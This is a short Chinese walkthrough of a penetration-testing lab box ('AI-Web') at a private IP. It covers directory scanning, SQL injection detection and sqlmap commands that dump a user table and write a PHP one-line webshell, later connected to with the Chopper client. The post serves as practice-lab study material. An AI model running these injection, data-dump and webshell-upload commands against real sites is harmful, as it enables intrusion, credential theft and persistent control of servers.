ai web渗透测试

1,使用御剑2014端口扫描工具进行扫描

最后通过不断的尝试,发现目标靶场ip为172.16.1.88

进入后如图

使用御剑无字典大小限制版扫描网站目录

获得一个链接,访问

发现robots.txt中有标明目录,我们再去尝试一一访问。

http://172.16.1.88/m3diNf0/

http://172.16.1.88/se3reTdir777/

我们碰巧发现了有输入框的页面,假如这次没发现这个页面,可以继续用御剑扫描各级目录的文件

现在尝试注入

输入1正常

输入1‘报错

可以得出它是post传参的方式,首先用bp抓包,然后设置注入点

在kili的终端输入sqlmap -r '/home/kali/Desktop/1.txt' --current-dbc查看当前数据库。库名:aiweb1

通过sqlmap -r '/home/kali/Desktop/1.txt' --batch -D aiweb1 --tables查表。表名:user、systemUser

通过sqlmap -r '/home/kali/Desktop/1.txt' --batch -D aiweb1 -T systemUser --dump查systemUser数据

进行写入文件前需要直到网站根目录,所以再次通过御剑扫描网站目录得到

由访问http://172.16.1.88/m3diNf0/info.php得文件所处路径/home/www/html/web1x443290o2sdf92213/m3diNf0/info.php

通过sqlmap -r '/home/kali/Desktop/1.txt' --file-write '/home/kali/Desktop/2.txt' --file-dest /home/www/html/web1x443290o2sdf92213/m3diNf0/uploads/zzy.php上传一句话木马

在用菜刀连接工具连接。
 

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值